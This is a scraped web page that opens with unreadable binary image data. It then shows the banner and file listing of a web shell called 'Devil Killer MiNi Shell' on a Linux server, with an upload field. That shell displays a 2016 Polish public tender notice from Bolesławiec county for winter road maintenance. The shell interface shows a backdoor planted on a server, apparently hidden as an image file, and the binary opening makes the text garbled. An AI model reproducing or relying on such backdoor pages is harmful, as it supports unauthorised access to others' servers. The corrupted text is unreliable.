JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/328406-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.bip.powiatboleslawiecki.pl' target='_blank'>www.bip.powiatboleslawiecki.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 328406 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bolesławiec: Zimowe utrzymanie dróg powiatowych w sezonie 2016/2017<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Bolesławiecki, krajowy numer identyfikacyjny
              23082929800000, ul.
              pl. Marszałka Józefa Piłsudskiego 
              2,
              59700  
              Bolesławiec, woj.
              dolnośląskie, państwo
              Polska, tel.
              757 323 258, e-mail
              , faks
              757 323 250.
              <br />
              Adres strony internetowej (URL): www.bip.powiatboleslawiecki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.powiatboleslawiecki.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.bip.powiatboleslawiecki.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Starostwo Powiatowe w Bolesławcu, ul. Armii Krajowej 12, 59-700 Bolesławiec</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zimowe utrzymanie dróg powiatowych w sezonie 2016/2017<br /><b>Numer referencyjny: </b>WIZ.272.1.12.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest usługa polegająca na zimowym utrzymaniu dróg powiatowych oraz chodników przy drogach powiatowych i wojewódzkich w sezonie 2016/2017.
2.	Świadczenie usługi będzie odbywać się zgodnie ze Specyfikacją Techniczną na zimowe utrzymanie dróg w powiecie bolesławieckim (stanowiącą załącznik nr 2A).  Usługa musi być wykonywana według standardów Zimowego Utrzymania Dróg (ZUD) opisanych 
w specyfikacji. Zamawiający zapewnia środki do ZUD (mieszankę piaskowo  solną, sól 
i solankę) oraz ich załadowanie na pojazdy Wykonawcy. Usługi ZUD będą świadczone na wezwanie uprawnionego pracownika ZDP w Bolesławcu w okresie obowiązywania umowy.
3.	Zamawiający dopuszcza składanie ofert częściowych. Usługa została podzielona na 9 części.
4.	W przypadku złożenia oferty na więcej niż 1 część Wykonawca musi posiadać taką ilość sprzętu, aby zapewnić wykonanie usługi równocześnie.
5.	Szczegółowy opis przedmiotu zamówienia, z podziałem na części zawiera załącznik nr 2 do SIWZ.
6.	Nadzór nad realizacją usługi pełnił będzie Zarząd Dróg Powiatowych w Bolesławcu.
7.	Wymagania zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy 
o pracę, o których mowa w art. 29 ust 3a ustawy, osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia: 
1)	Zamawiający wymaga zatrudnienia przez Wykonawcę w rozumieniu przepisów ustawy Kodeks pracy osób wykonujących następujące czynności w zakresie realizacji przedmiotu zamówienia:
	operatorów sprzętu tj. kierowców, jeżeli wykonywanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy. Obowiązek ten dotyczy także podwykonawców. Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób wykonujących wskazane wyżej czynności. 
2)	Szczegółowe zasady dokumentowania zatrudnienia na podstawie umowy o pracę ww. osób oraz kontrolowanie tego obowiązku przez Zamawiającego i przewidziane z tego tytułu sankcje określone są w § 4 ust. 6  12 oraz w § 8 ust. 1 pkt. 6-8 wzoru umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>34143000-1<br /><b> Dodatkowe kody CPV:</b>90620000-9,
                90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Dla części 1,2,3,4,5,6,7: a) dysponowanie zestawem złożonym z: pojazdu samochodowego o ładowności min. 8t z napędem co najmniej na 2 osie  szt.1, pługu średniego  szt. 1, piaskarko-solarki o pojemności co najmniej 6 t -szt. 1, lub b) dysponowanie jednym pojazdem specjalnym wyposażonym w pług i piaskarko-solarkę o pojemności co najmniej 6t. Za pług średni zamawiający uzna pług odśnieżny o wadze od 500-800 kg i szerokości od 2,5  3,0 m. Pojazdy zgłoszone do ZUD winny być wyposażone w system kontroli i monitoringu GPS. System powinien umożliwiać kontrolę lokalizacji pojazdu, pracy piaskarki, położenia pługa, przejechanej trasy, czasu pracy pojazdu. Wykonawca zapewni dostęp do systemu kontroli i monitorowania pracy pojazdów, z siedziby ZDP w Bolesławcu, umożliwiający korzystanie z niego przez dyżurnych ZUD przez 24 godziny na dobę w okresie trwania umowy. Pojazdy zgłoszone do ZUD winny być wyposażone w telefony komórkowe. (Numer telefonu przypisany do pojazdu).Dla części 8,9: - dysponowanie zestawem złożonym z pojazdu samochodowego z pługiem lekkim i piaskarką o d.m.c. zestawu do 5 T. Pojazdy zgłoszone do ZUD winny być wyposażone w system kontroli i monitoringu GPS. System powinien umożliwiać kontrolę lokalizacji pojazdu, pracy piaskarki, położenia pługa, przejechanej trasy, czasu pracy pojazdu. Wykonawca zapewni dostęp do systemu kontroli i monitorowania pracy pojazdów, z siedziby ZDP w Bolesławcu, umożliwiający korzystanie z niego przez dyżurnych ZUD przez 24 godziny na dobę w okresie trwania umowy. Pojazdy zgłoszone do ZUD winny być wyposażone w telefony komórkowe. (Numer telefonu przypisany do pojazdu). <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz narządzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacja o podstawie do dysponowania tymi zasobami  tj. wykaz pojazdów<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Oświadczenia wymagane postanowieniami rozdz. VII pkt. 1 SIWZ; 2) Oświadczenia dla podmiotów, na zdolnościach lub sytuacji których polega Wykonawca, wymagane postanowieniami rozdz. VIII pkt 6 SIWZ; 3) Zobowiązania wymagane postanowieniami rozdz. VIII pkt. 2 SIWZ, w przypadku gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu; 4) pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony; 5) pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia;</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
